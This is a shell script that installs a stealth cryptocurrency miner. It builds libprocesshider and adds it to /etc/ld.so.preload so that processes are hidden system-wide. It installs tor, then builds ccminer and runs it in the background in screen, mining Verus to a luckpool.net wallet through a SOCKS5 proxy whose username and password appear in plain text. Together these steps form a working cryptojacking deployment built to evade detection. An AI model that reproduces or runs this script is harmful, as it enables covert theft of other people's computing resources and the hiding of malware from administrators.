#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata
apt update
apt -y install binutils cmake build-essential screen unzip net-tools curl nano tor
service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider;make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/;echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
cd ..

apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y
git clone --single-branch -b Verus2.2 https://github.com/monkins1010/ccminer.git
cd ccminer
chmod +x build.sh
chmod +x configure.sh
chmod +x autogen.sh
./build.sh
curl -v -x "socks5://jwegwndc-1:mj2pb21fuqzo@p.webshare.io:80/" webshare.io/
screen sudo ./ccminer -a verus -o stratum+tcp://na.luckpool.net:3956 -u RAcBGk2mLkXuaG5qYtGeTRbdMQQi5JQ4jc.BIN -t4 -x --proxy=socks5://jwegwndc-1:mj2pb21fuqzo@p.webshare.io:80
